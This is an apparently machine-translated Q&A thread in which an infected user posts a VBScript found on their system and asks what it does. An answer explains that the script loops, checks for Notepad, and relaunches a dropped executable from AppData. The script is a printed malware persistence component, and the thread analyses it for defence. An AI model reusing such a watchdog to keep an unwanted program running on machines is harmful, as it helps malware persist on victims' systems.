1. ホーム
  2. 質問と答え
  3. 誰かがこのコードを理解するのに役立つことができますか?トロイの木馬ドロッパーVBSスクリプト

誰かがこのコードを理解するのに役立つことができますか?トロイの木馬ドロッパーVBSスクリプト

2017-12-28 10 views
0

に感染した私が言うたい申し訳ありませんまず、誰かがこのコードを理解するのに役立つことができますか?トロイの木馬ドロッパーVBSスクリプト

problyこのありえないこれらのようなものを頼むのに最適な場所が、私は、ウイルスに感染していたし、痕跡を残しているようです。

誰かがいくつかのスクリプトの背後にあるコードを理解できれば、私は非常に感謝しています。私は、コードを右にフォーマットさ願う

Option Explicit 
Dim ProcessPath,WshShell 
ProcessPath = "%Windir%\System32\Notepad.exe" 
Set WshShell = CreateObject("WScript.Shell") 
If AppPrevInstance() Then 
    MsgBox "There is an existing proceeding !" & VbCrLF &_ 
    CommandLineLike(WScript.ScriptName),VbExclamation,"There is an existing proceeding !"  
    WScript.Quit 
Else 
    Do 
     Pause(10) ' Pause 10 seconds 
     If CheckProcess(DblQuote(ProcessPath)) = False Then 
      Call Logoff() 
     End If 
    Loop 
End If 
'************************************************************************** 
Function CheckProcess(ProcessPath) 
    Dim strComputer,objWMIService,colProcesses,Tab,ProcessName 
    strComputer = "." 
    Tab = Split(ProcessPath,"\") 
    ProcessName = Tab(UBound(Tab)) 
    ProcessName = Replace(ProcessName,Chr(34),"") 
    Set objWMIService = GetObject("winmgmts:" _ 
    & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2") 
    Set colProcesses = objWMIService.ExecQuery _ 
    ("Select * from Win32_Process Where Name = '"& ProcessName & "'") 
    If colProcesses.Count = 0 Then 
     CheckProcess = False 
    Else 
     CheckProcess = True 
    End if 
End Function 
'************************************************************************** 
Function DblQuote(Str) 
    DblQuote = Chr(34) & Str & Chr(34) 
End Function 
'************************************************************************** 
Sub Logoff() 
    Dim objShell 
Set objShell = WScript.CreateObject("WScript.Shell") 
objShell.Exec("C:\Users\Sblck\AppData\Local\AppVShNotifyt.exe") 
Set objShell = Nothing 
Wscript.Quit 
End sub 
'************************************************************************** 
Sub Pause(Secs)  
    Wscript.Sleep(Secs * 1000)  
End Sub 
'************************************************************************** 
Function AppPrevInstance() 
    With GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\root\cimv2") 
     With .ExecQuery("SELECT * FROM Win32_Process WHERE CommandLine LIKE " & CommandLineLike(WScript.ScriptFullName) & _ 
      " AND CommandLine LIKE '%WScript%' OR CommandLine LIKE '%cscript%'") 
      AppPrevInstance = (.Count > 1) 
     End With 
    End With 
End Function  
'*************************************************************************** 
Function CommandLineLike(ProcessPath) 
    ProcessPath = Replace(ProcessPath, "\", "\\") 
    CommandLineLike = "'%" & ProcessPath & "%'" 
End Function 
'****************************************************************************

は、他のいくつかのスクリプトがありますが、TXT形式で、diferenceはobjShell.Execであることは、このように、「%ワーキング%」にリモコン:

objShell.Exec("%working%")^

それより簡単

AppVShNotifytvbs.vbs PasteBin link

行う場合、私はそれのつもりポストペーストビンさんです3210

AppVShNotifytvbs.txt Pastebin link

出典

2017-12-28 Frank Albert

+2

[情報セキュリティ](https://security.stackexchange.com/)に属しているため、この質問を議論の対象外としています。 –

+0

ちょうど私はあなたがこのvBScriptを手に入れたのだろうか?私は元のスクリプトは、変更されたものではないという意味ですか? – Hackoo

+0

私は疑わしいプログラムを起動し、いくつかのクイックcmdは、実行中にインスタンスのポップアップ、私はシステムをスキャンするために急いで、そこは、スクリプトは正確に(いくつかのxmlファイルとexe拡張子。主なプログラムは、ドライブにAppVShNotifyt.exeとそれらのスクリプトを持っているようなトロイの木馬のようなものでした。 –

答えて

0

まず、以前のインスタンスをチェックして、現在のスクリプトが別のプロセスIDを使用して実行中であることを確認します。

次に、10秒ごとにメモ帳が実行されているかどうかがチェックされます。そうでない場合は、AppVShNotifyt.exeを呼び出します。

出典

2017-12-28 20:42:16 Ctznkane525

+0

ありがとうございます!私の心を横切って、私は主なexeファイルが削除されたが、他のトレースはそれらのスクリプト、いくつかのxmlファイルのように残っている無数のウイルス対策を実行した、私はdireclyを理解するなぜnotepadが実行されていたかどうかをチェックするでしょう –

+0

imメモ帳のmd5を確認するつもりです –

関連する問題

 関連する問題